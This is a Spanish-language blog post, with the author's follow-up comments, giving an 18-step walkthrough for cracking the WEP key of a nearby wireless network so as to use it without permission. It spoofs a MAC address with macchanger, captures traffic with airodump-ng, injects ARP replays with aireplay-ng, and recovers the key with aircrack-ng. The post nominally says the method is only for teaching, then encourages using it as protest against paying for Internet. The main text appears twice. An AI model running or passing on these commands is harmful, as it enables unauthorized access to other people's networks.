(Breve explicación de cómo hackear una clave WEP para poder utilizar una señal inalámbrica de Internet protegida)
Si tu computadora capta las señales cercanas de Internet inalámbrico pero no puedes utilizarlas porque al tratar de conectarte te pide la clave WEP (WEP key) o una frase de contraseña, con este método podrás obtener la clave que necesitas para acceder a cualquier señal inalámbrica. Por supuesto, si la señal inalámbrica está protegida por WPA en lugar del WEP, entonces este método no funcionará. Sin embargo, la mayoría de servicios de Internet inalámbrica, a la fecha, utilizan como estándar de seguridad el WEP.
Este método utiliza como herramienta principal la distribución de linux “Back Track 3.0”, la cual fue precisamente diseñada para auditorías de seguridad informática. El Back Track es una distribución en formato LiveCD que surge de la combinación de dos distribuciones linux anteriores, “Whax” y “Auditor Security Collection”. Para los que saben un poco más de linux, es interesante saber que el Whax es la evolución del “Whoppix” (White Hat Knoppix). Si el Knoppix ha demostrado ser una herramienta muy poderosa, el Back Track recoge esto y mucho más.
Todo esto suena inteligible para quienes utilizan alguna distribución de linux como sistema operativo (OS), o cualquier otro OS de Unix. Pero... ¿qué pasa con los que sólo utilizan Windows? No se preocupen, el Back Track, como ya dije anteriormente, viene en formato LiveCD y se puede utilizar independientemente de qué OS tenga tu computadora. Esto significa que no tienes que instalar nada, sino que puedes correr el sistema desde un CD o una memoria USB. Por supuesto, yo les diría a los que todavía están limitados al imperio de Microsoft, que se pongan las pilas y hagan el cambio a linux, no importa qué distribución sea (Ubuntu, Suse, Red Hat, Mandriva, Slackware, etc.). Las posibilidades son inmensas.
Bueno... una vez dicho esto, procedamos a lo que nos interesa. Estos son los pasos que hay que seguir para obtener la clave WEP de nuestra señal captada:
1. Así como un doctor, mecánico o un carpintero no pueden hacer nada sin sus herramientas, así nosotros, primero tendremos que conseguir nuestra herramienta, es decir, la distribución LiveCD de Back Track. Para esto, vamos a la siguiente página: http://www.remote-exploit.org/backtrack_download.html Ahí podemos bajar la imagen .iso de Back Track, la cual después tendremos que quemar en un CD o una memoria USB. Sólo hay que dar click en donde dice: “Download: Click Here”. Esto puede ser un poco tardado. Si tenemos una conexión de Internet rápida, quizá sea un par de horas, si no, podría tardar más.
(Nota: Si queremos la imagen para CD, bajamos la primera opción que nos aparece en la página y si queremos hacerlo a través de una USB bajamos la segunda opción.)
2. Una vez que se haya bajado completamente la imagen tendrás en tu carpeta de descargas un archivo llamado “bt3-final.iso” o “bt3final_usb.iso” (dependiendo si bajaste la imagen para CD o para USB respectivamente).
Si descargaste la imagen para CD, sólo tienes que quemarla (descargarla) en un CD y listo, tendrás tu herramienta lista para usarse. Entonces salta el siguiente paso, y continúa leyendo en el punto 4.
3. Si descargaste la imagen para USB, entonces lo que tienes que hacer primero es copiar la imagen en tu USB. Después tendrás que extraer los archivos de la imagen en el USB. (Nota: necesitarás una memoria USB de al menos 1GB. Ahora tendrás en tu memoria dos carpetas (“boot” y “BT3”). Entra a la carpeta “boot” y:
Si tienes Windows, corre el archivo “bootinst.bat”. Si tienes Windows Vista, tendrás que correr el archivo con privilegios de administrador. Esto se hace dando click derecho sobre el archivo y seleccionando la opción de ejecutar con privilegios de administrador. Te va a salir una ventana de línea de comandos MS-DOS, y tendrás que dar “enter” dos veces, de acuerdo a las instrucciones que te vaya indicando el programa.
Si tienes un OS de linux, entonces ahí mismo dentro de la carpeta “boot” encontrarás un archivo que se llama "bootinst.sh". Ejecuta este archivo en terminal, y lo mismo, tendrás que darle “enter” dos veces, de acuerdo a lo que te vaya indicando el programa.
Esto hará que nuestra USB pueda servir para arrancar la computadora al prenderla.
4. Una vez que tenemos nuestra herramienta lista, ya sea el LiveCD o LiveUSB, procedamos a utilizarla. Inserta el CD o USB en tu computadora, y después apágala.
5. Ahora tendremos que entrar al BIOS de la computadora para cambiar la secuencia de arranque:
Normalmente, cuando enciendes una computadora, la primera pantalla que te sale es la de la compañía fabricante (Dell, Toshiba, IBM, etc.) Esta pantalla dura un par de segundos y después entra el sistema.
Lo que tienes que hacer es prender tu computadora, y enseguida, mientras está la primera pantalla del fabricante, presionar F2, F10 o F12, o la tecla de Escape, para entrar al BIOS. Normalmente en la pantalla misma te indica qué tecla tienes que presionar para entrar a la configuración (Setup) del BIOS. Esto depende del modelo de tu computadora.
Una vez que hayas presionado la tecla adecuada, tu computadora entrará al BIOS. Verás una pantalla (normalmente) azul, en modo de texto, en donde puedes cambiar la configuración de tu computadora.
Encuentra la opción en donde diga algo así como: “Secuencia de arranque” o si está en inglés: “Boot Sequence”. Ahí, lo que tienes que hacer es decirle a tu computadora que al encenderse, intente arrancar primero con un USB, o CD y después con el disco duro (HDD). Sólo tienes que seguir las indicaciones en tu pantalla para cambiar la secuencia de arranque. Yo tengo el orden en mi computadora de la siguente forma:
1. USB Storage Device
2. CD/DVD/CD-RW Drive
3. Internal HDD
4. Diskette Drive
Una vez, hecho esto. Guarda los cambios y sal del BIOS. Apaga la computadora.
6. Vuelve a encender tu computadora, (recuerda que ya debes tener el CD o USB dentro), y automáticamente entrará el sistema de Back Track.
La primera pantalla que verás será una de color gris con una serie de opciones. Para que sea más fácil y no haya problemas con los gráficos, baja a la tercera opción y dale "enter" en donde dice: “BT3 Graphics mode (KDE)”.
Ahora estarás arrancando tu computadora con el OS de Back Track.
7. Cuando termine de cargarse, verás en el escritorio el logo de Back Track 3. Este es el escritorio de KDE, uno de los más comunes en las distribuciones de linux.
Abajo, en la barra de tareas, dale click al logo azul que está en la esquina inferior izquierda que tiene una “K” (es el logo de KDE). Luego busca Internet>Wireless Assistant. Dale click, y tendrá que salir una ventana en donde puedes ver las señales inalámbricas de Internet que hay cercanas.
Si no ves ninguna señal es que a) no hay señales inalámbricas cercanas, o b) no está funcionando tu tarjeta de Internet inalámbrica.
Si ves las señales, entonces, significa que todo va bien. Puedes cerrar esta ventana.
8. Junto al logo azul de KDE, hay un ícono que parece un monitor negro de una computadora. Está es la consola, línea de comandos. Dale click ahí. Ahora te aparece una ventana con un cursor.
Aquí escribimos lo siguiente:
# airmon-ng
(Nota: No escribas el signo de número (#), esto sólo indica el cursor del usuario, y que es una nueva orden.)
Presiona “enter” y te saldrá algo como esto:
Interface Chipset Driver
eth1 Broadcom bcm43xx
9. Fíjate en la parte inferior izquierda de los datos que salieron, cómo se llama tu dispositivo de Internet inalámbrico. En mi caso, mi dispositivo se llama “eth1”. En tu caso, puede ser el mismo, o dependiendo de la computadora que uses, puede variar. Puede también ser algo así como “ath1” o “wlan0”, etc. Fíjate cómo se llama tu dispositivo y de ahora en adelante, en donde yo escriba “eth1”, tú vas a escribir el nombre de tu dispositivo.
10. Ahora escribimos lo siguiente:
# airmon-ng stop eth1
# ifconfig eth1 down
# macchanger --mac 00:11:22:33:44:55 eth1
(Nota: presiona “enter” después de cada orden)
Después de presionar “enter” en la última orden, te saldrá algo así como:
Current MAC: 00:23:12:c7:gh:3D (unknown)
Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
(Nota: pueden variar los números, pero es algo parecido).
11. Ahora escribe la siguiente orden:
# airmon-ng start eth1
Te tiene que resultar algo así:
Interface Chipset Driver
eth1 Broadcom bcm43xx (monitor mode enabled)
12. Ahora escribe la siguiente orden:
# airodump-ng eth1
Enseguida te salen una lista de las señales inalámbricas de Internet que está captando tu computadora. Quizá tengas que hacer la ventana más grande para ver toda la información. Encuentra la señal que quieras “atacar”, la “señal objetivo”. El nombre de la señal lo encuentras bajo el encabezado de “ESSID”.
Una vez que decidas de qué señal quieres obtener la clave WEP, entonces anota cuál es su BSSID, (es decir, los números correspondientes a esa señal que están bajo el encabezado de BSSID). Supongamos que es algo así como: 00:21:8D:99:B4:F2.
También anota el canal de esa señal. Este lo encuentras bajo el encabezado “CH”. Supongamos que el canal es “6”.
Una vez que tienes estos datos, puedes oprimir Ctrl C para cancelar.
13. Ahora escribe la siguiente orden, tomando los datos que acabas de anotar:
# airodump-ng -c 6 -w marx --bssid 00:21:8D:99:B4:F2 eth1
(Nota: Toma en cuenta que yo escribí el número “6” porque estamos suponiendo que el canal de mi señal objetivo es “6”. Tú escribe el canal que hayas anotado. También, yo escribí: “00:21:8D:99:B4:F2” porque estamos suponiendo que esa es la BSSID de la señal que queremos, es decir, de la señal objetivo. Tú pon la BSSID que hayas anotado de tu señal objetivo.)
Enseguida te salen nuevamente, los encabezados anteriores, pero ahora sólo ves listada la señal que escogiste. Mira bajo el encabezado de #Data, y asegúrate de que esté aumentando el número de datos.
14. Ahora abre otra ventana de consola, haciendo click en el ícono de la barra de tareas que parece un monitor. No cierres la ventana inicial, déjala abierta.
En la segunda consola, escribe lo siguiente:
# aireplay-ng -1 0 -a 00:21:8D:99:B4:F2 -h 00:11:22:33:44:55 eth1
(Nota: una vez más, tú tienes que sustituir en donde yo puse “ 00:21:8D:99:B4:F2” por el BSSID de tu señal objetivo. Por supuesto, también, donde yo pongo eth1, lo debes de haber estado sustituyendo todo este tiempo por tu propio dispositivo. Lo demás, lo escribes exactamente igual, incluyendo el “00:11:22:33:44:55”.)
15. Ahora escribe la siguiente orden:
# aireplay-ng -3 -b 00:21:8D:99:B4:F2 -h 00:11:22:33:44:55 eth1
(La misma nota anterior, sólo sustituye el BSSID de tu señal objetivo y el dispositivo si es diferente).
Ahora tendrás que esperar algunos minutos. Esto puede tardarse un rato.
En tu segunda consola, verás que van saliendo una serie de líneas que dicen algo así como: “Read 9876 packets (got 95 ARP requests and 39874 ACKs), sent 14255 packets...”
Esto significa que vamos bien.
16. Ahora observa la primera ventana que dejaste abierta. Bajo el encabezado de #Data, tienes que ver como mínimo 10000 datos antes de que puedas intentar acceder a la clave. Quizá tengas que esperar más, hasta que veas que el número se ha elevado a más de 10,000.
Una vez que veas que has llegado a más de 10000. Entonces, abre una tercera consola y escribe la siguiente orden:
# aircrack-ng -b 00:21:8D:99:B4:F2 marx-01.cap
(Nota: una vez más, sustituye el "00:21:8D:99:B4:F2" por el BSSID de tu señal objetivo)
17. Si todo ha salido bien, la orden buscará a través de un proceso estadístico la clave. Cuando termine de hacer esto verás algo así como:
KEY FOUND! [ 00:52:AA:32:BB ]
Decrypted correctly: 100%
Esto significa que la clave WEP de la señal objetivo es “0052AA32BB”. Es decir, sólo tienes que suprimir los dos puntos, y ese número será tu clave WEP.
Si no encontró la clave te saldrá algo así como:
Failed, Next try with 5000 Ivs.
Esto significa que tendrás que esperar hasta que junte otros 5000 paquetes de datos, y automáticamente hara otro intento. Lo más probable es que obtengas tu clave WEP desde el primer intento, con sólo 10000 paquetes, pero si no, pues espera otro rato, hasta que llegue a 15000 y entonces tendrás la clave.
18. Ahora sólo tienes que apuntar tu clave, reiniciar normalmente tu computadora (sin el LiveCD o LiveUSB), e intentar conectarte a la señal objetivo. Cuando te pida tu clave WEP pon la que acabas de obtener, y listo... estarás conectado al Internet.
(Nota: si utilizas linux, tienes que especificar si es Frase de contraseña o Clave hexadecimal. Normalmente es Clave hexadecimal lo que hay que poner. Si no, prueba con las dos. Tiene que ser cualquiera de esas dos.)
Bueno... pues espero que esto te haya sido de utilidad. Recuerda que esto sólo lo puedes hacer por motivos pedagógicos, no para usar Internet sin pagar. Ahora que... si tú no estás de acuerdo con el modelo económico actual capitalista que pretende hacer de la tecnología un privilegio para quienes puedan pagar, y que la tecnología tendría que estar al alcance del pueblo, entonces puedes usarlo como una objeción de conciencia. Cualquier duda, escribe tus comentarios.
Saludos, buena suerte y... ¡Abajo el capitalismo!
Si tu computadora capta las señales cercanas de Internet inalámbrico pero no puedes utilizarlas porque al tratar de conectarte te pide la clave WEP (WEP key) o una frase de contraseña, con este método podrás obtener la clave que necesitas para acceder a cualquier señal inalámbrica. Por supuesto, si la señal inalámbrica está protegida por WPA en lugar del WEP, entonces este método no funcionará. Sin embargo, la mayoría de servicios de Internet inalámbrica, a la fecha, utilizan como estándar de seguridad el WEP.
Este método utiliza como herramienta principal la distribución de linux “Back Track 3.0”, la cual fue precisamente diseñada para auditorías de seguridad informática. El Back Track es una distribución en formato LiveCD que surge de la combinación de dos distribuciones linux anteriores, “Whax” y “Auditor Security Collection”. Para los que saben un poco más de linux, es interesante saber que el Whax es la evolución del “Whoppix” (White Hat Knoppix). Si el Knoppix ha demostrado ser una herramienta muy poderosa, el Back Track recoge esto y mucho más.
Todo esto suena inteligible para quienes utilizan alguna distribución de linux como sistema operativo (OS), o cualquier otro OS de Unix. Pero... ¿qué pasa con los que sólo utilizan Windows? No se preocupen, el Back Track, como ya dije anteriormente, viene en formato LiveCD y se puede utilizar independientemente de qué OS tenga tu computadora. Esto significa que no tienes que instalar nada, sino que puedes correr el sistema desde un CD o una memoria USB. Por supuesto, yo les diría a los que todavía están limitados al imperio de Microsoft, que se pongan las pilas y hagan el cambio a linux, no importa qué distribución sea (Ubuntu, Suse, Red Hat, Mandriva, Slackware, etc.). Las posibilidades son inmensas.
Bueno... una vez dicho esto, procedamos a lo que nos interesa. Estos son los pasos que hay que seguir para obtener la clave WEP de nuestra señal captada:
1. Así como un doctor, mecánico o un carpintero no pueden hacer nada sin sus herramientas, así nosotros, primero tendremos que conseguir nuestra herramienta, es decir, la distribución LiveCD de Back Track. Para esto, vamos a la siguiente página: http://www.remote-exploit.org/backtrack_download.html Ahí podemos bajar la imagen .iso de Back Track, la cual después tendremos que quemar en un CD o una memoria USB. Sólo hay que dar click en donde dice: “Download: Click Here”. Esto puede ser un poco tardado. Si tenemos una conexión de Internet rápida, quizá sea un par de horas, si no, podría tardar más.
(Nota: Si queremos la imagen para CD, bajamos la primera opción que nos aparece en la página y si queremos hacerlo a través de una USB bajamos la segunda opción.)
2. Una vez que se haya bajado completamente la imagen tendrás en tu carpeta de descargas un archivo llamado “bt3-final.iso” o “bt3final_usb.iso” (dependiendo si bajaste la imagen para CD o para USB respectivamente).
Si descargaste la imagen para CD, sólo tienes que quemarla (descargarla) en un CD y listo, tendrás tu herramienta lista para usarse. Entonces salta el siguiente paso, y continúa leyendo en el punto 4.
3. Si descargaste la imagen para USB, entonces lo que tienes que hacer primero es copiar la imagen en tu USB. Después tendrás que extraer los archivos de la imagen en el USB. (Nota: necesitarás una memoria USB de al menos 1GB. Ahora tendrás en tu memoria dos carpetas (“boot” y “BT3”). Entra a la carpeta “boot” y:
Si tienes Windows, corre el archivo “bootinst.bat”. Si tienes Windows Vista, tendrás que correr el archivo con privilegios de administrador. Esto se hace dando click derecho sobre el archivo y seleccionando la opción de ejecutar con privilegios de administrador. Te va a salir una ventana de línea de comandos MS-DOS, y tendrás que dar “enter” dos veces, de acuerdo a las instrucciones que te vaya indicando el programa.
Si tienes un OS de linux, entonces ahí mismo dentro de la carpeta “boot” encontrarás un archivo que se llama "bootinst.sh". Ejecuta este archivo en terminal, y lo mismo, tendrás que darle “enter” dos veces, de acuerdo a lo que te vaya indicando el programa.
Esto hará que nuestra USB pueda servir para arrancar la computadora al prenderla.
4. Una vez que tenemos nuestra herramienta lista, ya sea el LiveCD o LiveUSB, procedamos a utilizarla. Inserta el CD o USB en tu computadora, y después apágala.
5. Ahora tendremos que entrar al BIOS de la computadora para cambiar la secuencia de arranque:
Normalmente, cuando enciendes una computadora, la primera pantalla que te sale es la de la compañía fabricante (Dell, Toshiba, IBM, etc.) Esta pantalla dura un par de segundos y después entra el sistema.
Lo que tienes que hacer es prender tu computadora, y enseguida, mientras está la primera pantalla del fabricante, presionar F2, F10 o F12, o la tecla de Escape, para entrar al BIOS. Normalmente en la pantalla misma te indica qué tecla tienes que presionar para entrar a la configuración (Setup) del BIOS. Esto depende del modelo de tu computadora.
Una vez que hayas presionado la tecla adecuada, tu computadora entrará al BIOS. Verás una pantalla (normalmente) azul, en modo de texto, en donde puedes cambiar la configuración de tu computadora.
Encuentra la opción en donde diga algo así como: “Secuencia de arranque” o si está en inglés: “Boot Sequence”. Ahí, lo que tienes que hacer es decirle a tu computadora que al encenderse, intente arrancar primero con un USB, o CD y después con el disco duro (HDD). Sólo tienes que seguir las indicaciones en tu pantalla para cambiar la secuencia de arranque. Yo tengo el orden en mi computadora de la siguente forma:
1. USB Storage Device
2. CD/DVD/CD-RW Drive
3. Internal HDD
4. Diskette Drive
Una vez, hecho esto. Guarda los cambios y sal del BIOS. Apaga la computadora.
6. Vuelve a encender tu computadora, (recuerda que ya debes tener el CD o USB dentro), y automáticamente entrará el sistema de Back Track.
La primera pantalla que verás será una de color gris con una serie de opciones. Para que sea más fácil y no haya problemas con los gráficos, baja a la tercera opción y dale "enter" en donde dice: “BT3 Graphics mode (KDE)”.
Ahora estarás arrancando tu computadora con el OS de Back Track.
7. Cuando termine de cargarse, verás en el escritorio el logo de Back Track 3. Este es el escritorio de KDE, uno de los más comunes en las distribuciones de linux.
Abajo, en la barra de tareas, dale click al logo azul que está en la esquina inferior izquierda que tiene una “K” (es el logo de KDE). Luego busca Internet>Wireless Assistant. Dale click, y tendrá que salir una ventana en donde puedes ver las señales inalámbricas de Internet que hay cercanas.
Si no ves ninguna señal es que a) no hay señales inalámbricas cercanas, o b) no está funcionando tu tarjeta de Internet inalámbrica.
Si ves las señales, entonces, significa que todo va bien. Puedes cerrar esta ventana.
8. Junto al logo azul de KDE, hay un ícono que parece un monitor negro de una computadora. Está es la consola, línea de comandos. Dale click ahí. Ahora te aparece una ventana con un cursor.
Aquí escribimos lo siguiente:
# airmon-ng
(Nota: No escribas el signo de número (#), esto sólo indica el cursor del usuario, y que es una nueva orden.)
Presiona “enter” y te saldrá algo como esto:
Interface Chipset Driver
eth1 Broadcom bcm43xx
9. Fíjate en la parte inferior izquierda de los datos que salieron, cómo se llama tu dispositivo de Internet inalámbrico. En mi caso, mi dispositivo se llama “eth1”. En tu caso, puede ser el mismo, o dependiendo de la computadora que uses, puede variar. Puede también ser algo así como “ath1” o “wlan0”, etc. Fíjate cómo se llama tu dispositivo y de ahora en adelante, en donde yo escriba “eth1”, tú vas a escribir el nombre de tu dispositivo.
10. Ahora escribimos lo siguiente:
# airmon-ng stop eth1
# ifconfig eth1 down
# macchanger --mac 00:11:22:33:44:55 eth1
(Nota: presiona “enter” después de cada orden)
Después de presionar “enter” en la última orden, te saldrá algo así como:
Current MAC: 00:23:12:c7:gh:3D (unknown)
Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
(Nota: pueden variar los números, pero es algo parecido).
11. Ahora escribe la siguiente orden:
# airmon-ng start eth1
Te tiene que resultar algo así:
Interface Chipset Driver
eth1 Broadcom bcm43xx (monitor mode enabled)
12. Ahora escribe la siguiente orden:
# airodump-ng eth1
Enseguida te salen una lista de las señales inalámbricas de Internet que está captando tu computadora. Quizá tengas que hacer la ventana más grande para ver toda la información. Encuentra la señal que quieras “atacar”, la “señal objetivo”. El nombre de la señal lo encuentras bajo el encabezado de “ESSID”.
Una vez que decidas de qué señal quieres obtener la clave WEP, entonces anota cuál es su BSSID, (es decir, los números correspondientes a esa señal que están bajo el encabezado de BSSID). Supongamos que es algo así como: 00:21:8D:99:B4:F2.
También anota el canal de esa señal. Este lo encuentras bajo el encabezado “CH”. Supongamos que el canal es “6”.
Una vez que tienes estos datos, puedes oprimir Ctrl C para cancelar.
13. Ahora escribe la siguiente orden, tomando los datos que acabas de anotar:
# airodump-ng -c 6 -w marx --bssid 00:21:8D:99:B4:F2 eth1
(Nota: Toma en cuenta que yo escribí el número “6” porque estamos suponiendo que el canal de mi señal objetivo es “6”. Tú escribe el canal que hayas anotado. También, yo escribí: “00:21:8D:99:B4:F2” porque estamos suponiendo que esa es la BSSID de la señal que queremos, es decir, de la señal objetivo. Tú pon la BSSID que hayas anotado de tu señal objetivo.)
Enseguida te salen nuevamente, los encabezados anteriores, pero ahora sólo ves listada la señal que escogiste. Mira bajo el encabezado de #Data, y asegúrate de que esté aumentando el número de datos.
14. Ahora abre otra ventana de consola, haciendo click en el ícono de la barra de tareas que parece un monitor. No cierres la ventana inicial, déjala abierta.
En la segunda consola, escribe lo siguiente:
# aireplay-ng -1 0 -a 00:21:8D:99:B4:F2 -h 00:11:22:33:44:55 eth1
(Nota: una vez más, tú tienes que sustituir en donde yo puse “ 00:21:8D:99:B4:F2” por el BSSID de tu señal objetivo. Por supuesto, también, donde yo pongo eth1, lo debes de haber estado sustituyendo todo este tiempo por tu propio dispositivo. Lo demás, lo escribes exactamente igual, incluyendo el “00:11:22:33:44:55”.)
15. Ahora escribe la siguiente orden:
# aireplay-ng -3 -b 00:21:8D:99:B4:F2 -h 00:11:22:33:44:55 eth1
(La misma nota anterior, sólo sustituye el BSSID de tu señal objetivo y el dispositivo si es diferente).
Ahora tendrás que esperar algunos minutos. Esto puede tardarse un rato.
En tu segunda consola, verás que van saliendo una serie de líneas que dicen algo así como: “Read 9876 packets (got 95 ARP requests and 39874 ACKs), sent 14255 packets...”
Esto significa que vamos bien.
16. Ahora observa la primera ventana que dejaste abierta. Bajo el encabezado de #Data, tienes que ver como mínimo 10000 datos antes de que puedas intentar acceder a la clave. Quizá tengas que esperar más, hasta que veas que el número se ha elevado a más de 10,000.
Una vez que veas que has llegado a más de 10000. Entonces, abre una tercera consola y escribe la siguiente orden:
# aircrack-ng -b 00:21:8D:99:B4:F2 marx-01.cap
(Nota: una vez más, sustituye el "00:21:8D:99:B4:F2" por el BSSID de tu señal objetivo)
17. Si todo ha salido bien, la orden buscará a través de un proceso estadístico la clave. Cuando termine de hacer esto verás algo así como:
KEY FOUND! [ 00:52:AA:32:BB ]
Decrypted correctly: 100%
Esto significa que la clave WEP de la señal objetivo es “0052AA32BB”. Es decir, sólo tienes que suprimir los dos puntos, y ese número será tu clave WEP.
Si no encontró la clave te saldrá algo así como:
Failed, Next try with 5000 Ivs.
Esto significa que tendrás que esperar hasta que junte otros 5000 paquetes de datos, y automáticamente hara otro intento. Lo más probable es que obtengas tu clave WEP desde el primer intento, con sólo 10000 paquetes, pero si no, pues espera otro rato, hasta que llegue a 15000 y entonces tendrás la clave.
18. Ahora sólo tienes que apuntar tu clave, reiniciar normalmente tu computadora (sin el LiveCD o LiveUSB), e intentar conectarte a la señal objetivo. Cuando te pida tu clave WEP pon la que acabas de obtener, y listo... estarás conectado al Internet.
(Nota: si utilizas linux, tienes que especificar si es Frase de contraseña o Clave hexadecimal. Normalmente es Clave hexadecimal lo que hay que poner. Si no, prueba con las dos. Tiene que ser cualquiera de esas dos.)
Bueno... pues espero que esto te haya sido de utilidad. Recuerda que esto sólo lo puedes hacer por motivos pedagógicos, no para usar Internet sin pagar. Ahora que... si tú no estás de acuerdo con el modelo económico actual capitalista que pretende hacer de la tecnología un privilegio para quienes puedan pagar, y que la tecnología tendría que estar al alcance del pueblo, entonces puedes usarlo como una objeción de conciencia. Cualquier duda, escribe tus comentarios.
Saludos, buena suerte y... ¡Abajo el capitalismo!
Bueno... al parecer no funciona en todos los modelos de computadoras, pues no todos pueden inyectar paquetes.
ResponderEliminarHasta ahora, este método ha funcionado muy bien en las Compaq, en una Dell Inspiron 2200, y en una Dell Inspiron 1300.
En las Toshiba Satellite no he podido inyectar paquetes... Estoy tratando de buscar otras opciones...
Mientras tanto, si no funciona en algún modelo de computadora, prueba con otra computadora...
Hmmm... hay una forma mucho más fácil para hacer el Live USB.
ResponderEliminar1. Descarga el programa Unetbootin de la siguiente página:
http://unetbootin.sourceforge.net/
2. Una vez que lo hayas descargado, ejecútalo en tu computadora.
3. Asegúrate que tengas montada una USB pendrive vacía en tu computadora.
4. Marca en la parte de arriba del programa, el programa Backtrack 4, y asegurate que hasta abajo diga que lo va a bajar en la USB. Dale aceptar...
5. Espera un rato, y finalmente... tendrás el BackTrack Live USB listo para usarse.
Continúa con el paso No. 5 de las instrucciones para el Internet Gratis.
PD. (Si cuando entra el Sistema Operativo de Backtrack 4, no entra en modo gráfico (GUI) sino que terminas con un cursor... sólo escribe ahí [startx] para que entre al modo gráfico de KDE.)